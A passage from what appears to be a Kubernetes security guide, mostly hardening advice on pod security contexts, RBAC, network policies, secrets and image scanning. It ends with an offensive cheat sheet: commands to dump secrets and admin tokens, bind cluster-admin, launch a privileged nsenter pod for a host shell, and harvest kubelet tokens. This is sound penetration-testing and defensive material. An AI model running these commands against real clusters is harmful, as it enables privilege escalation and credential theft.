  runAsUser: 1000

# ✅ Read-only root filesystem
securityContext:
  readOnlyRootFilesystem: true

# ✅ Disable privilege escalation
securityContext:
  allowPrivilegeEscalation: false

# ❌ Avoid privileged containers
# Never use: privileged: true

# ❌ Avoid hostPath mounts
# Minimize: hostPath volumes

# ❌ Avoid host namespaces
# Don't use: hostNetwork, hostPID, hostIPC: true

RBAC Security

# ✅ Principle of least privilege
# Grant only necessary permissions

# ✅ Avoid wildcards in RBAC
# Don't use: resources: ["*"]
# Don't use: verbs: ["*"]

# ✅ Scope to namespaces
# Use Roles instead of ClusterRoles when possible

# ✅ Audit RBAC regularly
kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'

# ✅ Disable auto-mounting of service account tokens
automountServiceAccountToken: false

# ✅ Create dedicated service accounts
# Don't use default service account

Network Security

# ✅ Implement Network Policies
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

# ✅ Restrict egress traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-only
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          name: kube-system
    ports:
    - protocol: UDP
      port: 53

# ✅ Use service mesh for mTLS
# Consider Istio, Linkerd

Secrets Management

# ✅ Encrypt secrets at rest
--encryption-provider-config=/etc/kubernetes/encryption-config.yaml

# ✅ Use external secret managers
# AWS Secrets Manager, HashiCorp Vault, etc.

# ✅ Rotate secrets regularly
kubectl create secret generic my-secret --dry-run=client -o yaml | kubectl apply -f -

# ✅ Limit secret access
# Use RBAC to restrict secret access

# ❌ Don't store secrets in code or ConfigMaps
# Use Secrets resource instead

Monitoring and Logging

# ✅ Enable audit logging
--audit-log-path=/var/log/kubernetes/audit.log

# ✅ Monitor API server access
# Watch for unusual API calls

# ✅ Use runtime security tools
# Falco, Tetragon, Tracee

# ✅ Monitor RBAC changes
kubectl get events --watch | grep -i rolebinding

# ✅ Implement SIEM integration
# Send Kubernetes logs to SIEM

# ✅ Alert on suspicious activities
# Privilege escalation attempts
# New ClusterRoleBindings
# Privileged pod creation
# Node access

Image Security

# ✅ Scan images for vulnerabilities
trivy image <image-name>

# ✅ Use image signing and verification
# Implement Cosign, Notary

# ✅ Use private registries
# Don't pull from untrusted registries

# ✅ Implement admission controllers
# OPA Gatekeeper, Kyverno

# ✅ Use distroless/minimal base images
FROM gcr.io/distroless/static

# ✅ Scan running workloads
trivy k8s cluster

Quick Reference Commands

Enumeration Quick Wins

# Am I in a pod?
ls /var/run/secrets/kubernetes.io/serviceaccount/

# What can I do?
kubectl auth can-i --list

# Get all secrets (if allowed)
kubectl get secrets --all-namespaces -o json

# Find admin tokens
kubectl get secrets -n kube-system | grep -i admin

# Check for privileged pods
kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(any(.spec.containers[]; .securityContext.privileged == true)) | "\(.metadata.namespace)/\(.metadata.name)"'
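
When working from a dumped pod list, the same check can be scripted. Note that `privileged` sits on each container's `securityContext`, not on the pod-level one. A sketch; `pods_json` is assumed to be the parsed output of `kubectl get pods --all-namespaces -o json`:

```python
# Flag every pod that runs at least one privileged container.
def privileged_pods(pods_json):
    """Return namespace/name for each pod with a privileged container."""
    hits = []
    for pod in pods_json.get("items", []):
        for c in pod.get("spec", {}).get("containers", []):
            if (c.get("securityContext") or {}).get("privileged"):
                meta = pod["metadata"]
                hits.append("{}/{}".format(meta["namespace"], meta["name"]))
                break
    return hits
```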

Exploitation Quick Wins

# Create cluster-admin binding (if allowed)
kubectl create clusterrolebinding hacker --clusterrole=cluster-admin --serviceaccount=default:default

# Deploy privileged pod
kubectl run hacker --image=alpine --restart=Never --overrides='{"spec":{"hostNetwork":true,"hostPID":true,"containers":[{"name":"hacker","image":"alpine","command":["nsenter","--target","1","--mount","--uts","--ipc","--net","--pid","--","bash"],"securityContext":{"privileged":true}}]}}'

# Extract token from another pod
kubectl exec <pod-name> -- cat /var/run/secrets/kubernetes.io/serviceaccount/token

Common Attack Scenarios

# Scenario 1: Get secrets → Extract admin token → Escalate
kubectl get secrets --all-namespaces

# Scenario 2: Create pods → Mount privileged SA → Escalate
kubectl create -f privileged-pod.yaml

# Scenario 3: Bind roles → Grant cluster-admin → Escalate
kubectl create clusterrolebinding

# Scenario 4: Impersonate → Act as admin → Escalate
kubectl --as=admin get secrets

# Scenario 5: Node access → Collect tokens → Escalate
chroot /host && find /var/lib/kubelet/pods -name token

Additional Resources

  - Kubernetes documentation
  - HackTricks resources
  - Learning resources
  - MITRE ATT&CK for Containers
